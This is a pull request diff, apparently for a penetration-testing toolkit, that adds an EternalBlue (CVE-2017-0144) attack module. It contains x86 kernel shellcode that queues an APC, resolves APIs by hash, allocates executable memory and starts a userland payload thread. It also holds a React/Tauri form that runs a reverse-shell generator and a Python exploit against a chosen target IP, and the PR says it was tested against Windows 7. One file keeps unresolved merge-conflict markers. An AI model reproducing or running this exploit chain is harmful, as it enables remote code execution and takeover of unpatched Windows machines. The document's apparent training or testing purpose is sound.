+    ;   SystemArgument2 is third argument in usermode code
+    xor eax, eax
+    push eax
+    push eax    ; SystemArgument2
+    push eax    ; SystemArgument1
+    push esi    ; PKAPC
+    mov eax, KEINSERTQUEUEAPC_HASH
+    call win_api_direct
+    ; if insertion failed, try next thread
+    test eax, eax
+    jz _insert_queue_apc_loop
+    
+    mov eax, [ebp+DATA_KAPC_OFFSET+0xc]      ; get KAPC.ApcListEntry
+    ; EPROCESS pointer 4 bytes
+    ; InProgressFlags 1 byte
+    ; KernelApcPending 1 byte
+    ; if success, UserApcPending MUST be 1
+    cmp byte [eax+0xe], 1
+    je _insert_queue_apc_done
+    
+    ; manual remove list without lock
+    mov [eax], eax
+    mov [eax+4], eax
+    jmp _insert_queue_apc_loop
+
+_insert_queue_apc_done:
+    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
+
+_r3_to_r0_done:
+    ret
+
+;========================================================================
+; Call function in specific module
+; 
+; All function arguments are passed as calling normal function with extra register arguments
+; Extra Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
+;                  eax = hash of target function name
+;========================================================================
+win_api_direct:
+    call get_proc_addr
+    jmp eax
+
+
+;========================================================================
+; Get function address in specific module
+; 
+; Arguments: [ebp+DATA_MODULE_ADDR_OFFSET] = module pointer
+;            eax = hash of target function name
+; Return: eax = offset
+;========================================================================
+get_proc_addr:
+    pushad
+
+    mov ebp, [ebp+DATA_MODULE_ADDR_OFFSET]   ; ebp = module address
+    xchg edi, eax   ; edi = hash
+    
+    mov eax, dword [ebp+0x3c]  ; Get PE header e_lfanew
+    mov edx, dword [ebp+eax+0x78] ; Get export tables RVA
+
+    add edx, ebp    ; edx = EAT
+
+    mov ecx, dword [edx+0x18]  ; NumberOfFunctions
+    mov ebx, dword [edx+0x20]  ; FunctionNames
+    add ebx, ebp
+
+_get_proc_addr_get_next_func:
+    ; When we reach the start of the EAT (we search backwards), we hang or crash
+    dec ecx                     ; decrement NumberOfFunctions
+    mov esi, dword [ebx+ecx*4]  ; Get rva of next module name
+    add esi, ebp                ; Add the modules base address
+
+    call calc_hash
+
+    cmp eax, edi                        ; Compare the hashes
+    jnz _get_proc_addr_get_next_func    ; try the next function
+
+_get_proc_addr_finish:
+    mov ebx, dword [edx+0x24]
+    add ebx, ebp                ; ordinate table virtual address
+    mov cx, word [ebx+ecx*2]    ; desired functions ordinal
+    mov ebx, dword [edx+0x1c]   ; Get the function addresses table rva
+    add ebx, ebp                ; Add the modules base address
+    mov eax, dword [ebx+ecx*4]  ; Get the desired functions RVA
+    add eax, ebp                ; Add the modules base address to get the functions actual VA
+
+    mov [esp+0x1c], eax
+    popad
+    ret
+
+;========================================================================
+; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
+; 
+; Argument: esi = string to hash
+; Clobber: esi
+; Return: eax = hash
+;========================================================================
+calc_hash:
+    push edx
+    xor eax, eax
+    cdq
+_calc_hash_loop:
+    lodsb                   ; Read in the next byte of the ASCII string
+    ror edx, 13             ; Rotate right our hash value
+    add edx, eax            ; Add the next byte of the string
+    test eax, eax           ; Stop when found NULL
+    jne _calc_hash_loop
+    xchg edx, eax
+    pop edx
+    ret
+
+
+
+; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
+; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
+; Moreover, there is no lock when calling KernelApcRoutine.
+;
+; VOID KernelApcRoutine(
+;           IN PKAPC Apc,
+;           IN PKNORMAL_ROUTINE *NormalRoutine,
+;           IN PVOID *NormalContext,
+;           IN PVOID *SystemArgument1,
+;           IN PVOID *SystemArgument2)
+kernel_kapc_routine:
+    ; reorder stack to make everything easier
+    pop eax
+    mov [esp+0x10], eax    ; move saved eip to &SystemArgument2
+    pop eax     ; PKAPC (unused)
+    pop ecx     ; &NormalRoutine
+    pop eax     ; &NormalContext
+    pop edx     ; &SystemArgument1
+    
+    pushad
+    push edx    ; &SystemArgument1 (use for set CreateThread address)
+    push ecx    ; &NormalRoutine
+    
+    mov ebp, [eax]      ; *NormalContext is our data area pointer
+
+    ;======================================
+    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
+    ;======================================
+    xor eax, eax
+    mov byte [fs:0x24], al	; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
+    cdq
+    
+    mov al, 0x40    ; eax = 0x40
+    push eax            ; PAGE_EXECUTE_READWRITE = 0x40
+    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
+    push eax            ; MEM_COMMIT = 0x1000
+    push esp            ; &RegionSize = 0x1000 (reuse MEM_COMMIT argument in stack)
+    push edx            ; ZeroBits
+    mov [ecx], edx
+    push ecx            ; baseAddr = 0
+    dec edx
+    push edx            ; ProcessHandle = -1
+    mov eax, ZWALLOCATEVIRTUALMEMORY_HASH
+    call win_api_direct
+%ifndef COMPACT
+    test eax, eax
+    jnz _kernel_kapc_routine_exit
+%endif
+    
+    ;======================================
+    ; copy userland payload
+    ;======================================
+    pop eax
+    mov edi, [eax]
+    call _kernel_kapc_routine_find_userland
+_kernel_kapc_routine_find_userland:
+    pop esi
+    add esi, userland_start-_kernel_kapc_routine_find_userland
+    mov ecx, 0x400  ; fix payload size to 1024 bytes
+    rep movsb
+    
+    ;======================================
+    ; find current PEB
+    ;======================================
+    mov eax, [ebp+DATA_EPROCESS_OFFSET]
+    push eax
+    mov eax, PSGETPROCESSPEB_HASH
+    call win_api_direct
+    
+    ;======================================
+    ; find CreateThread address (in kernel32.dll)
+    ;======================================
+    mov eax, [eax + 0xc]        ; PEB->Ldr
+    mov eax, [eax + 0x14]       ; InMemoryOrderModuleList
+
+%ifdef COMPACT
+    mov esi, [eax]      ; first one always be executable, skip it
+    lodsd               ; skip ntdll.dll
+%else
+_find_kernel32_dll_loop:
+    mov eax, [eax]       ; first one always be executable
+    ; offset 0x1c (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
+    ; offset 0x24 (WORD)  => must be 0x18 (name len kernel32.dll)
+    ; offset 0x28  => is name
+    ; offset 0x10  => is dllbase
+    ;cmp word [eax+0x1c], 0x40
+    ;jne _find_kernel32_dll_loop
+    cmp word [eax+0x24], 0x18
+    jne _find_kernel32_dll_loop
+    
+    mov edx, [eax+0x28]
+    ; check only "32" because name might be lowercase or uppercase
+    cmp dword [edx+0xc], 0x00320033   ; 3\x002\x00
+    jnz _find_kernel32_dll_loop
+%endif
+    
+    mov ebx, [eax+0x10]
+    mov [ebp+DATA_MODULE_ADDR_OFFSET], ebx
+    mov eax, CREATETHREAD_HASH
+    call get_proc_addr
+
+    ; save CreateThread address to SystemArgument1
+    pop ecx
+    mov [ecx], eax
+    
+_kernel_kapc_routine_exit:
+    xor eax, eax
+    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
+    mov byte [ebp+DATA_QUEUEING_KAPC_OFFSET], al
+    ; restore IRQL to APC_LEVEL
+    inc eax
+    mov byte [fs:0x24], al
+    
+    popad
+    ret
+
+  
+userland_start:
+userland_start_thread:
+    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
+    pop edx     ; saved eip
+    pop eax     ; first argument (NormalContext)
+    pop eax     ; CreateThread address passed from kernel
+    pop ecx     ; another argument (NULL) passed from kernel
+    push ecx        ; lpThreadId = NULL
+    push ecx        ; dwCreationFlags = 0
+    push ecx        ; lpParameter = NULL
+    call _userland_start_thread_find_payload
+_userland_start_thread_find_payload:
+    add dword [esp], userland_payload-_userland_start_thread_find_payload    ; lpStartAddr
+    push ecx        ; dwStackSize = 0
+    push ecx        ; lpThreadAttributes = NULL
+    push edx    ; restore saved eip
+    jmp eax
+    
+userland_payload:

--- a/src/components/CVE-2017-0144/CVE-2017-0144.tsx
+++ b/src/components/CVE-2017-0144/CVE-2017-0144.tsx
@@ -1,0 +1,100 @@
+import { Button, LoadingOverlay, NativeSelect, NumberInput, Stack, TextInput, Title } from "@mantine/core";
+import { useForm } from "@mantine/form";
+import { useCallback, useState } from "react";
+import { CommandHelper } from "../../utils/CommandHelper";
+import ConsoleWrapper from "../ConsoleWrapper/ConsoleWrapper";
+import { Child, Command } from "@tauri-apps/api/shell";
+
+interface FormValues {
+    hostIP: string;
+    targetIP: string;
+    hostPort: number;
+    targetPort: number;
+    architecture: string;
+}
+
+export function CVE20170144() {
+    const [loading, setLoading] = useState(false);
+
+    const [output, setOutput] = useState("");
+    const [selectedArchitecture, setSelectedArchitecture] = useState("x64");
+
+    let form = useForm({
+        initialValues: {
+            hostIP: "",
+            targetIP: "",
+            hostPort: 4444,
+            targetPort: 445,
+            architecture: "",
+        },
+    });
+
+    const onSubmit = async (values: FormValues) => {
+        setLoading(true);
+
+        const args = [
+            "/usr/share/ddt/CVE-2017-0144/Shellcode/create_shell.sh",
+            `${values.hostIP}`,
+
+            `${values.hostPort}`,
+        ];
+
+        try {
+            const output = await CommandHelper.runCommand("bash", args);
+            setOutput(output);
+        } catch (e: any) {
+            setOutput(e);
+        }
+
+        setOutput(output);
+
+        const exploit = ["/usr/share/ddt/CVE-2017-0144/CVE-2017-0144.py", `${values.targetIP}`];
+        if (values.architecture === "x64") {
+            exploit.push("/home/kali/Deakin-Detonator-Toolkit/sc_x64.bin");
+        } else if (values.architecture === "x86") {
+            exploit.push("/home/kali/Deakin-Detonator-Toolkit/sc_x86.bin");
+        }
+
+        const exploitOutput = await CommandHelper.runCommand("python3", exploit);
+
+        setOutput(exploitOutput);
+
+        setLoading(false);
+    };
+
+    const clearOutput = useCallback(() => {
+        setOutput("");
+    }, [setOutput]);
+
+    return (
+        <form onSubmit={form.onSubmit((values) => onSubmit({ ...values, architecture: selectedArchitecture }))}>
+            <LoadingOverlay visible={loading} />
+            <Stack>
+                <Title>Windows 7/2008 SMBv1 RCE (CVE-2017-0144)</Title>
+                <TextInput
+                    label={"Host IP (your machine, for the reverse shell)"}
+                    required
+                    {...form.getInputProps("hostIP")}
+                />
+
+                <NumberInput
+                    label={"Host port (Start your nectcat listener for reverse shell)"}
+                    {...form.getInputProps("hostPort")}
+                />
+                <TextInput label={"Target IP"} required {...form.getInputProps("targetIP")} />
+                <NumberInput disabled label={"Target port"} required {...form.getInputProps("targetPort")} />
+                <NativeSelect
+                    value={selectedArchitecture}
+                    onChange={(e) => setSelectedArchitecture(e.target.value)}
+                    title={"Architecture option"}
+                    data={["x64", "x86"]}
+                    required
+                    label={"Pick an architecture"}
+                />
+                <Button type={"submit"}>Exploit</Button>
+                <ConsoleWrapper output={output} clearOutputCallback={clearOutput} />
+            </Stack>
+        </form>
+    );
+}
+export default CVE20170144;

--- a/src/components/RouteWrapper.tsx
+++ b/src/components/RouteWrapper.tsx
@@ -17,6 +17,11 @@ import Urlsnarf from "./Urlsnarf/Urlsnarf";
 import { ZeroLogon } from "./ZeroLogon/Zerologon";
 import SearchSploit from "./SearchSploit/SearchSploit";
 import { WalkthroughsPage } from "../pages/Walkthroughs";
+<<<<<<< HEAD
+=======
+import VulscanTool from "./VulscanTool/VulscanTool";
+import { CVE20170144 } from "./CVE-2017-0144/CVE-2017-0144";
+>>>>>>> 47c60a5 (CVE-2017-0144 attack vector/exploit added)
 
 export interface RouteProperties {
     name: string;
@@ -115,6 +120,12 @@ export const ROUTES: RouteProperties[] = [
         path: "/attack-vectors/cve-2021-44228",
         element: <CVE202144228 />,
         description: "Vulnerability in the Apache Log4j 2 Java library allowing RCE",
+    },
+    {
+        name: "CVE-2017-0144",
+        path: "/attack-vectors/cve-2017-0144",
+        element: <CVE20170144 />,
+        description: "Windows SMB (SMBv1) Remote Code Execution Vulnerability",
     },
     {
         name: "Find offset",

--- a/src/pages/References.tsx
+++ b/src/pages/References.tsx
@@ -89,6 +89,12 @@ const ReferencesPage = () => {
                         }
                         url={"https://www.kali.org/tools/dirb/"}
                     />
+                    <Title order={4}>Attack Vectors:</Title>
+                    <Reference
+                        name={"CVE-2017-0144 - Eternal Blue"}
+                        description={"Windows SMB Remote Code Execution Vulnerability"}
+                        url={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0144"}
+                    />
                 </Stack>
             </Group>
         </>


### PR DESCRIPTION
CVE-2017-0144 attack vector added.
Includes shell generator script for reverse shell and python exploit for windows 7/8.
Added Attack vectors to references.
Tested successfully on Windows 7 machine. 

<img width="883" alt="Screenshot-cve20170144" src="https://user-images.githubusercontent.com/92580247/190904402-a67f3459-0cee-4247-a218-3b68c75fbcd4.png">
